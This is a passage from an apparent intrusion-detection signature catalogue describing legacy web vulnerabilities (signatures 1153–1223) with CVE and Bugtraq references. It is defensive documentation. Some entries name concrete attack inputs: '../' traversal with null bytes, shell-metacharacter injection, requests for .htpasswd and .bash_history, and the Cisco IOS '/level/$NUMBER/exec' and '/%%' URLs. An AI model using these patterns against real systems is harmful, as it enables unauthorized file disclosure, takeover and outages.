arbitrary shell commands with the privileges of the web server. Leif M. Wright simplestguest.cgi 2.0 is prone to this
vulnerability: the guestbook parameter of simplestguest.cgi 2.0 is vulnerable if it consists of commands.
Signature ID: 1153
Snorkerz.cmd access
Threat Level: Information
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a CGI
application running on a web server. Some applications do not perform stringent checks when validating the credentials
of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly
escalated privileges to that of the administrator.
Signature ID: 1154
WEB-CGI statusconfig.pl access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0113 CVE-2001-0114 Bugtraq: 2211
Signature Description: An input validation error exists in the statusconfig.pl script included in OmniHTTPD version
2.0.7. It uses the mostbrowsers parameter to build the stats.pl script, which is then executed on the web server. A remote
attacker can inject system commands in the parameter to execute them and gain privileges. Omnicron OmniHTTPD 2.0.7 is
prone to this vulnerability.
Signature ID: 1155
Thinking Arts ES.One Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0305 CVE-2001-0804 Bugtraq: 2385,3028 Nessus: 10817
Signature Description: The Thinking Arts LTD E-Commerce package comes with a webstore frontend called store.cgi
which allows people to order products on their website over a SQL database. Thinking Arts ES.One 1.0 is vulnerable:
this version's store.cgi script does not properly validate user-supplied data. A remote attacker could send specially
crafted URL requests containing '../' sequences and '%00' escape characters to the store.cgi script, which will disclose
the directory listing and the files and directories of the target (web server) that have read permissions.
Signature ID: 1156
Interactive Story Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0804 Bugtraq: 3028 Nessus: 10817
Signature Description: Valerie Mates Interactive Story 1.3 is a vulnerable version. A remote attacker can set the 'next'
field to a file name and use "dot dot" sequences (/../) to traverse directories and read any file on the system. The script
(story.pl) does not properly validate the values passed in the hidden field 'next' in such requests, so the remote attacker
can traverse directories on the Web server.
Signature ID: 1157
WEB-CGI streaming server view_broadcast.cgi access
Threat Level: Information
Industry ID: CVE-2003-0422 Bugtraq: 8257
Signature Description: Apple's QuickTime Streaming Server is a technology that allows sending streaming media to clients
across the Internet using the industry-standard RTP and RTSP protocols. Darwin Streaming Server provides a high
level of customizability and runs on a variety of platforms, allowing the code to be modified to fit specific needs. Apple
QuickTime Streaming Server 4.1.3 and Apple Darwin Streaming Server 4.1.3 are vulnerable to a denial of service
condition. When an HTTP request is made to the view_broadcast.cgi script without specifying any parameters, the server
will not accept new connections. This vulnerability is fixed in QuickTime/Darwin Streaming Server 4.1.3g.
Administrators are advised to update to version 4.1.3g or later to resolve this issue.
Signature ID: 1158
Way to the Web TalkBack.cgi Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0420 Bugtraq: 2547
Signature Description: TalkBack is a CGI script written by Way to the Web that allows website administrators to
facilitate user feedback. Way to the Web TalkBack 1.1 and prior versions are vulnerable. A vulnerability exists in
talkback.cgi which can allow a remote user to traverse the file system of a target host. A malicious user (remote
attacker) sends a specially crafted URI to 'talkback.cgi' with an invalid value passed to the 'article' parameter; the script
does not properly validate this user-supplied input, which may lead to the disclosure of possibly sensitive file contents.
Patches are available; update to the latest version found at the vendor website.
Signature ID: 1159
WEB-CGI technote main.cgi file directory traversal attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0075 Bugtraq: 2156
Signature Description: Technote provides software for Technics, Roland, Yamaha, Casio and Hammond, MIDI files,
accessories, music, free downloads, forums and more. Technote 2001/2000 versions are vulnerable: in these versions the
'main.cgi' script does not properly validate user input supplied through the URI. A malicious user (remote attacker)
sends a specially crafted URI to this script; when the request is received, the attacker-supplied variable is used as a
filename when the open() function is called. In addition to allowing the attacker to specify a file to be opened remotely,
the variable is not checked for '../' character sequences. As a result, the remote attacker can specify any file on the file
system in this variable (by using ../ sequences followed by its real path), which will be opened by the script. Its
contents will then be disclosed to the attacker. No remedy available.
Signature ID: 1160
WEB-CGI technote print.cgi directory traversal attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0075 Bugtraq: 2156
Signature Description: Technote provides software for Technics, Roland, Yamaha, Casio and Hammond, MIDI files,
accessories, music, free downloads, forums and more. Technote 2001/2000 versions are vulnerable: in these versions the
'print.cgi' script does not properly validate user input supplied through the URI. A malicious user (remote attacker)
sends a specially crafted URI to this script; when the request is received, the attacker-supplied variable is used for
processing. In addition to allowing the attacker to specify a file to be opened remotely, the variable is not checked for
'../' character sequences. As a result, the remote attacker can specify any file on the file system in this variable (by using
../ sequences followed by its real path), which will be opened by the script. Its contents will then be disclosed to the
attacker. No remedy available.
Signature ID: 1161
WEB-CGI test.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-1999-0070 Bugtraq: 2003
Signature Description: A vulnerability in the test-cgi script included with some http daemons makes it possible for the
users of Web clients to read a listing of files they are not authorized to read. This script is designed to display
information about the Web server environment, but it parses data requests too liberally and thus allows a person to view
a listing of arbitrary files on the Web server host.
Signature ID: 1162
WEB-CGI txt2html.cgi access disclosure Vulnerability
Threat Level: Information
Signature Description: Text to HTML (txt2html) is a program that converts plain text to HTML. It supports headings,
lists, simple character markup, and hyperlinking. It can also be used to aid in writing new HTML documents. This rule
triggers when an attacker accesses txt2html.cgi with "dot dot" sequences (/../). Successful exploitation can allow an
attacker to read arbitrary files on the system.
Signature ID: 1163
WEB-CGI upload.pl access Vulnerability
Threat Level: Information
Signature Description: Upload.pl is a simple CGI Perl script to upload files. The script uses a text file as a user database.
The text file contains the colon-separated userid, Unix crypted password and user's upload path. This rule triggers
when an attacker accesses the upload.pl script. Successful exploitation can allow an attacker to gain sensitive
information such as userids and passwords.
Signature ID: 1164
Blackboard CourseInfo 4.0 Database Modification Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0627 Bugtraq: 1486
Signature Description: Blackboard is a Web-based integrated teaching and learning environment. Blackboard
CourseInfo supports online classes at major universities such as Cornell University, Georgetown University, Yale
University, Tufts University and the University of Pittsburgh, and is available on both Unix and Windows NT platforms.
Blackboard CourseInfo 4.0 is a vulnerable version: this version allows any user who has a valid account to make
modifications to the database. An attacker can enter custom form values through any Perl script located in /bin
and its subdirectories to change other users' passwords or assign elevated security privileges. The attacker can perform
these operations on user_update_admin.pl.
Signature ID: 1165
Blackboard CourseInfo 4.0 Database Modification Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0627 Bugtraq: 1486
Signature Description: Blackboard is a Web-based integrated teaching and learning environment. Blackboard
CourseInfo supports online classes at major universities such as Cornell University, Georgetown University, Yale
University, Tufts University and the University of Pittsburgh, and is available on both Unix and Windows NT platforms.
Blackboard CourseInfo 4.0 is a vulnerable version: this version allows any user who has a valid account to make
modifications to the database. An attacker can enter custom form values through any Perl script located in /bin
and its subdirectories to change other users' passwords or assign elevated security privileges.
Signature ID: 1166
Apple QuickTime/Darwin Streaming Server view_broadcast.cgi Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0422 Bugtraq: 8257
Signature Description: QuickTime is a multimedia framework developed by Apple Inc., capable of handling various
formats of digital video, media clips, sound, text, animation, music, and several types of interactive panoramic images.
Apple QuickTime/Darwin Streaming Server 4.1.3 and earlier on Windows are vulnerable to a denial of service condition.
A malicious user (remote attacker) could send a specially crafted request to the view_broadcast.cgi script: whenever an
HTTP request is made to the view_broadcast.cgi script without specifying any parameters, the server will not accept
new connections.
Signature ID: 1167
WEB-CGI w3tvars.pm access Vulnerability
Threat Level: Information
Signature Description: The w3tvars.pm file is used to locate the database name, host name, user name, and password for
the database. This signature detects when an attacker accesses the w3tvars.pm file. Successful exploitation can allow an
attacker to gain sensitive information such as the user name and password.
Signature ID: 1168
WEB-CGI wais.pl access Vulnerability
Threat Level: Information
Signature Description: WAIS is a program for searching large databases, lists, documents, directories of files, and so
on. It can also be used to provide search access to collections of audio, video, image, and multimedia information. This
rule triggers when an attacker requests the 'wais.pl' script. Successful exploitation can allow an attacker to gain
sensitive information.
Signature ID: 1169
WEB-CGI web-map.cgi access Vulnerability
Threat Level: Information
Signature Description: Web Map is a PHP script which provides a simple and easy-to-use web-based map. It is possible for
users to view the map as an enlarged image, and it also allows them to add their own points of interest directly on the map
and customize the settings without knowledge of PHP. This signature detects when an attacker accesses the web-map.cgi
script.
Signature ID: 1170
WEB-CGI webdist.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0039 Bugtraq: 374 Nessus: 10299
Signature Description: IRIX is a computer operating system developed by SGI to run natively on their 32-bit and 64-bit MIPS architecture workstations and servers. The InfoSearch package converts man pages and other documentation into HTML web content; its search form uses infosrch.cgi. SGI IRIX 6.3, 6.2, 6.1, 5.3, 5.2, 5.1, and 5.0 are vulnerable. The 'webdist.cgi' CGI program allows remote attackers to execute arbitrary commands with the privileges of the web server process via shell metacharacters in the 'distloc' parameter.
Signature ID: 1171
WEB-CGI webplus directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0282 Bugtraq: 1102
Signature Description: Webplus is a powerful and comprehensive development language for creating web-based client/server applications. The webpsvr daemon is the driving process for the TalentSoft, Inc. web-based e-commerce software. The Web+ server runs under a standard web server, such as Apache. Users run a CGI script called webplus (webplus.exe on Windows), which communicates with webpsvr to serve up the web pages for the electronic store implemented by Web+. TalentSoft Web+ 4.x versions are vulnerable: a remote attacker could send a specially crafted request URL containing a ../ (dot dot) sequence in the 'script' variable passed to the webplus CGI. Because the CGI accepts a path to any file via the script variable, arbitrary files can be displayed to the browser.
Signature ID: 1172
Website Professional Directory Revealing Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0066 Bugtraq: 932
Signature Description: O'Reilly Software WebSite Professional 2.4.9 and O'Reilly Software WebSite Professional 2.3.18 are vulnerable. By sending a malformed URL request, a remote attacker can obtain the complete absolute directory path for web documents on a target server: the default error code 404 output displays the absolute path of the web document directory on the server running WebSite Pro.
Signature ID: 1173
Webcom Datakommunikation CGI Guestbook rguest/wguest Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0287 CVE-1999-0467 Bugtraq: 2024
Signature Description: The WebCOM Network is a collection of state (Department), District, and Post internet communications and information sites that are under one umbrella organization for format; like going into a nationwide grocery store, you know where items will be from store to store. WebCom Datakommunikation Guestbook 0.1 is the vulnerable version. A remote attacker could send a specially crafted request to rguest.exe or wguest.exe, specifying a path and filename as the "template" parameter. These programs do not validate the parameter properly, so such a request can retrieve the contents of arbitrary files to which the web server has access.
Signature ID: 1174
CgiCentral WebStore Arbitrary Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1343 Bugtraq: 2861
Signature Description: WebStore is a shopping cart application that processes and manages online purchases: a website that sells products or services, typically with an online shopping cart associated with it. With the popularity of the Internet rapidly increasing, online shopping became advantageous for retail store owners, and many traditional "brick and mortar" stores saw value in opening webstore counterparts. cgiCentral WebStore 400CS 4.14 and cgiCentral WebStore 400 4.14 are vulnerable. A malicious administrator who does not have access to the host serving the script may use this vulnerability to gain access. If remote attackers can authenticate as administrators, they may also be able to exploit this vulnerability to gain access to the host. Ws_mail.cgi calls system() with user-supplied data in the command string. Because it does not filter metacharacters out of the user-supplied data, administrators can execute arbitrary commands on web server hosts.
Signature ID: 1175
Www-sql access Vulnerability
Threat Level: Information
Signature Description: WWW-SQL is a script that provides a web interface for accessing MySQL or PostgreSQL databases. It is a simple embedded scripting language whose commands are embedded in special HTML tags. This rule triggers when an attacker accesses the www-sql script; an attacker can use this vulnerability to gain sensitive information on the web server.
Signature ID: 1176
WWWBoard Password Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0953 Bugtraq: 649 Nessus: 10321
Signature Description: WWWBoard is a threaded World Wide Web discussion forum and message board that allows users to post new messages. It stores encrypted passwords in a password file (passwd.txt) located under the web root. This rule triggers when an attacker accesses the wwwadmin.pl script; an attacker can use this vulnerability to change the name and location of 'passwd.txt'.
Signature ID: 1177
Abe Timmerman zml.cgi File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1209 Bugtraq: 3759 Nessus: 10830
Signature Description: Zml.cgi is a Perl script that supports server side include directives under Apache. It recognizes a simple set of commands and allows access to CGI parameters and environment variables. It can run on Linux and Unix systems or any other platform with Apache and Perl support. All versions of Abe Timmerman zml.cgi are vulnerable: a remote attacker could send a specially crafted URL request containing "dot dot" sequences (/../) with a null byte character (%00) appended to the file name parameter. Because the zml.cgi script does not validate such requests properly, the attacker can view arbitrary files and directories on the web server.
Signature ID: 1178
Ipswitch WhatsUp Gold prn.htm Denial Of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0799 Bugtraq: 11110
Signature Description: Ipswitch WhatsUp Gold is comprehensive network monitoring software that allows IT managers to turn network data into actionable business information by proactively monitoring all critical network devices and services. Ipswitch has created a forum where users can share WhatsUp Gold product ideas and experiences with other users online; the forum is generally unmoderated, but Ipswitch occasionally posts comments. The HTTP daemon in Ipswitch WhatsUp Gold 8.03 is vulnerable to a denial of service (server crash) when handling certain HTTP GET requests to the web interface from authenticated users. If the request sent by the attacker contains an MS-DOS device name, as demonstrated using "prn.htm", the program crashes and the device no longer responds.
Signature ID: 1179
NetScreen SA 5000 delhomepage.cgi XSS Vulnerability
Threat Level: Warning
Bugtraq: 9791
Signature Description: NetScreen is a firewall product line from Juniper. The NetScreen NetScreen-SA 5000 Series is prone to a cross-site scripting vulnerability that may allow an attacker to execute arbitrary HTML or script code in the browser of a vulnerable user. A remote attacker sends a URI request with a 'row' parameter to the 'delhomepage.cgi' script; because the script does not properly validate the user-supplied data in such requests, the attacker can execute arbitrary HTML or script code in the victim's browser.
Signature ID: 1180
RiSearch/RiSearch Pro Open Proxy Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2061 Bugtraq: 10812
Signature Description: The RiSearch (and Pro) suite is a set of Perl scripts that enables users to search web sites. RiSearch does not use any libraries or database systems, just pure Perl, so it can be used on any server where a user account has CGI access (even on some free hosting providers). The script works with different languages and offers a simple, convenient query language. RiSearch Software RiSearch Pro 3.2.6 and RiSearch Software RiSearch versions 0.99.1 to 0.99.8 are vulnerable. A remote attacker could send an invalid URI request to the 'show.pl' script, which does not properly validate user-supplied URI parameters. The remote attacker may exploit this condition to launch attacks against local and public services in the context of the site hosting the vulnerable script.
Signature ID: 1181
Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0798 Bugtraq: 11043
Signature Description: WhatsUp Gold is network management software for businesses of all sizes, with SNMP and WMI monitoring, comprehensive discovery, and instant alerting, notification, and reporting capabilities for single-site networks. Ipswitch WhatsUp Gold 8.0 3, 8.0 1, 8.0, 7.0 4, 7.0 3, and 7.0 are vulnerable to a buffer overflow. A remote attacker could post a specially crafted long string for the instancename parameter to overflow a buffer and execute arbitrary code on the system: the _maincfgret.cgi script copies the user-supplied input into a buffer of insufficient size, which then overflows.
Signature ID: 1185
IBill Management Script Weak Hard-Coded Password Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0839 Bugtraq: 3476 Nessus: 11083
Signature Description: iBill Internet Billing Company Processing Plus 0 is the vulnerable version. iBill hard codes a weak password for the user management script, ibillpm.pl, installed for clients that use the Password Management system. The weak password is the client's MASTER_ACCOUNT plus only two lower-case letters (aa - zz), so an attacker can bypass the billing system and easily add, delete, or change the password of arbitrary users in the .htpasswd file by brute force. The CGI keeps no audit record of the changes it makes, nor does the web log file indicate what username was added to the system (it does not log POST data). In addition, the requests in the web log file all have HTTP response code 200, which usually does not indicate a problem in error_log.
Signature ID: 1186
Mailman directory traversal attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0202
Signature Description: Mailman is free software for managing electronic mail discussion and e-newsletter lists. Mailman is integrated with the web, making it easy for users to manage their accounts and for list owners to administer their lists. Mailman 2.1.5 and earlier versions allow arbitrary files to be read. A remote attacker who is a member of a private Mailman list can submit a specially crafted URL containing dot dot sequences (../) to access files on the system. Because the true_path() function does not properly validate user-supplied input in the request, the attacker may be able to view files on the web server, including the Mailman configuration files and passwords.
Signature ID: 1191
Cobalt RaQ .bash_history Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0408 Bugtraq: 337
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access, possibly privileges escalated to those of the administrator, and access to the .bash_history file. Cobalt RaQ 1.1 is prone to this vulnerability.
Signature ID: 1192
DOT history access Vulnerability
Threat Level: Information
Signature Description: This signature detects when an attacker retrieves the '.history' file. Affected web servers allow attackers to retrieve the command history file, which lists the commands executed by the administrator and may contain sensitive information such as passwords and user names. Cobalt RaQ 1.1 is a vulnerable server, and this vulnerability is possible on other servers as well.
Signature ID: 1193
DOT htaccess access Vulnerability
Threat Level: Information
Signature Description: UNIX-based web servers, such as Apache and Netscape Enterprise Server, use ".htaccess" files to customize security settings on a per-directory level. These files can specify things like which users have access to which resources, which hosts are allowed or denied, and what type of authentication system to use. This type of data would be most useful for carrying out an attack on the site.
Signature ID: 1194
DOT htpasswd access Vulnerability
Threat Level: Information
Signature Description: Htpasswd is used to create and update the flat files that store user names and passwords for basic authentication of HTTP users. This rule triggers when an attacker attempts to download the .htpasswd file; an attacker can use this vulnerability to gain sensitive information such as user names and passwords.
Signature ID: 1195
Nsconfig access Vulnerability
Threat Level: Information
Signature Description: The .nsconfig file is used by the Netscape web server for configuration directives. It is a simple text file that records exactly which folders are password protected; without this file, directories cannot be password protected. This rule triggers when an attacker probes for the .nsconfig file. Successful exploitation can allow an attacker to gain access to the web server.
Signature ID: 1196
Wwwacl access Vulnerability
Threat Level: Information
Signature Description: The .wwwacl file contains important information, including the location of the web passwd file. It is used by CERN-derived web servers for configuration directives. This signature detects when an attacker accesses the '.wwwacl' file. Successful exploitation can allow an attacker to gain access to the web server.
Signature ID: 1197
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0884 Bugtraq: 1806
Signature Description: Internet Information Services is a set of Internet-based services for servers using Microsoft Windows. Microsoft Personal Web Server 4.0 and Microsoft IIS 5.0 are vulnerable: these versions allow a remote attacker to access any file or folder on the web server that is reachable with "anonymous" access. A remote attacker could send a specially crafted URL containing Unicode characters that represent slashes ("/") and backslashes ("\"). Because the server does not properly validate the user-supplied data in such requests, the sanity checks that would normally deny them are bypassed, and the attacker can access files and folders on the web server with the privileges of the IUSR_<machinename> account (the anonymous user account for IIS).
Signature ID: 1199
Pacific Software Carello File Duplication and Source Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0396 Bugtraq: 1245
Signature Description: Carello Web allows merchants to build and update an online store and customer-friendly shopping cart system. Carello Web version 1.2.1 may reveal the source code of files on the server. An attacker could use the "add.exe" component in Carello Web to create copies of known files on the web server using a different file extension for the new file, then submit an HTTP request for the new file to view its source code and gain sensitive information, such as usernames and passwords. No remedy was available as of September 2008.
Signature ID: 1200
/cgi-bin/// access Vulnerability
Threat Level: Information
Bugtraq: 6145
Signature Description: This signature detects when an attacker sends a URI containing a slash-slash sequence ('//'). Such a request may allow an attacker to disclose files on the vulnerable web server, effectively bypassing any access controls. The vulnerable server is Simple Web Server 0.5.1, and this vulnerability is possible on other web servers as well.
Signature ID: 1201
ECWare CGI Denial Of Service Vulnerability
Threat Level: Information
Bugtraq: 6066
Signature Description: ECware is electronic commerce software for Windows NT that provides merchants with the ability to sell physical and digital products over the Internet with real-time credit card authorizations. ECware versions 4.0.0 and 5.0.0 are prone to a denial of service vulnerability. The issue is triggered in the ECware.exe CGI program, which does not exit properly when certain errors occur. IIS (Internet Information Server) then stops responding to HTTP requests, and the errant ECware.exe process is not terminated. Even if the web server is stopped and restarted to regain normal functionality, some ECware.exe processes may continue to run and consume memory on the system until the computer is rebooted. The issue is fixed in ECware 5.1 or later; updating to the latest version, available from the vendor's web site, removes this issue.
Signature ID: 1202
/home/ftp access
Threat Level: Information
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator through /home/ftp access.
Signature ID: 1203
/home/www access
Threat Level: Information
Nessus: 11032
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator through /home/www access.
Signature ID: 1204
/~ftp access Vulnerability
Threat Level: Information
Signature Description: FTP (File Transfer Protocol) is the protocol for exchanging files over the Internet. It is used to exchange files between computer accounts, to transfer files between an account and a desktop computer, or to access software archives on the Internet. This signature detects when an attacker sends a request for '/~ftp'. Successful exploitation can allow an attacker to gain FTP permissions and read, write, or transfer files.
Signature ID: 1205
3Com Wireless Router 3CRADSL72 app_sta.stm access Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1596 Bugtraq: 11408
Signature Description: A router is a computer whose software and hardware are usually tailored to the tasks of routing and forwarding information; routers generally contain a specialized operating system. The 3Com 3CRADSL72 Wireless Router is vulnerable to information disclosure and authentication bypass. This can allow a remote attacker to disclose sensitive information such as the router name, primary and secondary DNS servers, and default gateway. Attackers could also reportedly gain administrative access to the router.
Signature ID: 1206
Admin_files directory access Vulnerability
Threat Level: Information
Signature Description: Shopping cart programs can use the admin_files directory for storing configuration files. This rule detects when an attacker attempts to access the admin_files directory. Successful exploitation can allow an attacker to gain unauthorized information and to scan the web server for installed applications.
Signature ID: 1207
Allaire JRun Servlet DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1049 Bugtraq: 2337
Signature Description: JRun is a Java application server supporting Java Server Pages, Java servlets, and other Java-related technologies. The /servlet URL prefix is mapped as a handler for invoking servlets; servlets are stored hierarchically and accessed via a naming convention of that type. Macromedia JRun 3.0 is vulnerable to denial of service. Allaire JRun 3.0 does not perform proper checks when validating the credentials of a client host connecting to the services offered on a host server, which can lead to unauthorized access, possibly privileges escalated to those of the administrator, and access to servlet/ files. A remote attacker can request a specially crafted URL that contains "/servlet/" in the path, followed by a long string of periods ("."), to consume all system resources on the JRun servlet server.
Signature ID: 1209
Microsoft IIS Malformed .htr Request Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0304 Bugtraq: 1191
Signature Description: Internet Information Services is a set of Internet-based services for servers using Microsoft Windows. Microsoft IIS 4.0 and 5.0 with the IISADMPWD virtual directory installed allow a remote attacker to cause a denial of service. A remote attacker could send a malformed password-change request to the inetinfo.exe program; the server CPU then becomes fully utilized until the administrator performs a reboot to regain normal functionality.
Signature ID: 1210
HTTP Request Basic Authorization Scheme Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0727 Bugtraq: 8375
Signature Description: Some URLs require authentication in order for a user to gain access. A user agent that wishes to authenticate itself with a server does so by including an Authorization request-header field with the request. RFC 2616 and 2617 define two authentication mechanisms, "Basic" and "Digest". This rule triggers when a long HTTP Basic authorization scheme header is observed. Oracle9i Database Server Release 2 is vulnerable: a remote attacker could overflow a buffer by sending a large Authorization string and execute arbitrary code on the system. Oracle has released a patch, which can be obtained from Oracle Security Alert #58. Oracle Oracle9i Standard Edition 9.2.0.1, Oracle Oracle9i Personal Edition 9.2.0.1, and Oracle Oracle9i Enterprise Edition 9.2.0.1 are prone to this vulnerability.
Signature ID: 1211
BB4 Technologies Big Brother Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0638 Bugtraq: 1455 Nessus: 10460
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly privileges escalated to those of the administrator through Big Brother /bb-hostsvc.sh access. Sean MacGuire Big Brother 1.4 H, 1.4 g, 1.4, 1.3, 1.2, 1.1, 1.0 9d, 1.0 9c, 1.0 9b, and 1.0 are prone to this vulnerability.
Signature ID: 1212
BitMover BitKeeper Daemon Mode Remote Command Execution Vulnerability
Threat Level: Warning
Bugtraq: 6588
Signature Description: BitKeeper is a cross-platform commercial application for managing software development, providing distributed revision control (configuration management, SCM, etc.) of computer source code. A sophisticated distributed system, BitKeeper competes largely against other professional systems such as Rational ClearCase and Perforce. BitMover BitKeeper 3.0 is the vulnerable version. When used in daemon mode, BitKeeper opens a listening service that can be accessed via an ordinary HTTP request. A remote attacker could send a specially crafted request; because the server does not correctly process the user-supplied input, this allows execution of arbitrary code.
Signature ID: 1213
BugPort Unauthorized Configuration File Viewing Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2353 Bugtraq: 9542
Signature Description: BugPort is an open-source, web-based system for managing tasks and defects throughout the software development process. BugPort is written in the cross-platform PHP language (using its object-oriented capabilities) and uses a relational database for storage and querying. It is useful for bug tracking purposes (internal management of software development and QA). All versions from INCOGEN BugPort 1.090 to INCOGEN BugPort 1.098 are vulnerable: a remote attacker could send a specially crafted URI request to disclose sensitive information. The contents of the BugPort configuration file are served to remote users who request the file, which could disclose sensitive configuration information that may be useful when mounting further attacks.
Signature ID: 1214
CISCO PIX Firewall Manager directory traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0158 Bugtraq: 691 Nessus: 10819
Signature Description: Cisco PIX Firewall Manager (PFM) is a web-based application built on a hardened platform that includes a limited HTTP server. The PFM HTTP server runs on Windows NT computers. PIX firewalls provide a wide range of security and networking services including Network Address Translation (NAT) or Port Address Translation (PAT), content filtering (Java/ActiveX), URL filtering, IPsec VPN, support for leading X.509 PKI solutions, and DHCP client/server. Cisco PIX Firewall 4.2.1 and Cisco PIX Firewall 4.1.6 are vulnerable: these versions allow a malicious user to retrieve arbitrary files from the web server. A remote attacker could send a specially crafted URI request to the web server containing traversal-style attack patterns (../../). Because the server does not properly validate the user-supplied input in such requests, the attacker may retrieve potentially sensitive files that could aid in further compromise.
Signature ID: 1215
CISCO VoIP DOS ATTEMPT Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0882 Bugtraq: 4794,4798 Nessus: 11013
Signature Description: The 7900 series VoIP phones are a Voice-over-IP solution distributed by Cisco Systems. It is possible to deny service to users of this line of phones: by placing a request to the /StreamingStatistics script with an arbitrarily high stream ID value, the phone resets itself, leaving it unable to place or receive calls for a period of up to thirty seconds. This has reportedly been reproduced by passing stream ID values greater than 32768, and consistently reproduced with a value of 120000. Cisco VoIP Phone CP-7960 3.2, CP-7960 3.1, CP-7960 3.0, CP-7940 3.2, CP-7940 3.1, CP-7940 3.0, CP-7910 3.2, CP-7910 3.1, and CP-7910 3.0 are prone to this vulnerability.
Signature ID: 1216
CISCO VoIP Web Interface System Memory Contents Information Leakage Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0882 Bugtraq: 4798
Signature Description: The 7900 series VoIP phones are a Voice-over-IP solution distributed by Cisco Systems. By placing a request to the /PortInformation script with an arbitrarily high port ID value, the web server returns a dump of the contents of phone memory. This has reportedly been reproduced by passing port ID values greater than 32768, and consistently reproduced with a value of 120000. Cisco VoIP Phone CP-7960 3.2, CP-7960 3.1, CP-7960 3.0, CP-7940 3.2, CP-7940 3.1, CP-7940 3.0, CP-7910 3.2, CP-7910 3.1, and CP-7910 3.0 are prone to this vulnerability.
Signature ID: 1217
Cisco IOS HTTP %% DOS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0380 Bugtraq: 1154 Nessus: 10387
Signature Description: The HTTP server was introduced in IOS release 11.0 to extend router management to the World Wide Web. The defect appears in a function added in IOS releases 11.1 and 11.2 that parses special characters in a URI of the format "%nn", where each "n" represents a hexadecimal digit. Cisco IOS 12.0.7 and prior versions are vulnerable to denial of service. The vulnerability is exposed when an attempt is made to browse to the router with "%%" characters following the IP address or domain name (for example "<router-ip>/%%"). The router does not correctly parse "%%" and enters an infinite loop; a watchdog timer expires two minutes later and forces the router to crash and reload.
Signature ID: 1218
Cisco IOS HTTP configuration attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0537 Bugtraq: 2936 Nessus: 10700
Signature Description: Cisco IOS is router firmware developed and distributed by Cisco Systems. IOS runs on numerous Cisco devices, including routers and switches. It is possible to gain full remote administrative access on devices using affected releases of IOS: by using a URL of the form http://router.address/level/$NUMBER/exec/...., where $NUMBER is an integer between 16 and 99, a remote user can gain full administrative access. This may lead to further compromise of the network or result in a denial of service.
Signature ID: 1219
Compaq Web-based Management Agent Denial of Service vulnerability
Threat Level: Warning
Bugtraq: 8014
Signature Description: Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when malformed requests are made to the service. The resulting error reports a stack overflow; however, it has not been confirmed whether this issue can be exploited to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.
Signature ID: 1220
Trend Micro InterScan ContentFilter.dll access Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan that manages spam, message content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager 3.51 and Trend Micro InterScan eManager 3.51J are vulnerable to a stack-based buffer overflow. Several CGI components of eManager do not validate user input: overly long values received in a request are copied without proper validation into a static buffer, which overflows, allowing an attacker to execute arbitrary code within the Local System context. This signature triggers when an attacker accesses the 'ContentFilter.dll' file.
Signature ID: 1221
Crystal Reports crystalImageHandler.aspx directory traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0204 Bugtraq: 10260 Nessus: 12271
Signature Description: Crystal Reports is a reporting solution that helps you design, explore, visualize, and deliver
reports via the web or embedded in enterprise applications. Microsoft Visual Studio .NET 2003, Outlook 2003 with
Business Contact Manager, and Business Solutions CRM 1.2 are vulnerable: the Crystal Reports and Crystal Enterprise
Web Form Viewer shipped with them is prone to a directory traversal vulnerability. These versions can allow an
attacker to retrieve and delete files, allowing for information disclosure and denial of service attacks. A remote attacker
can exploit this issue by sending directory traversal sequences and requesting a file through a vulnerable parameter of
one of the affected modules. Patches are available at the Business Objects and Microsoft vendor websites.
Signature ID: 1223
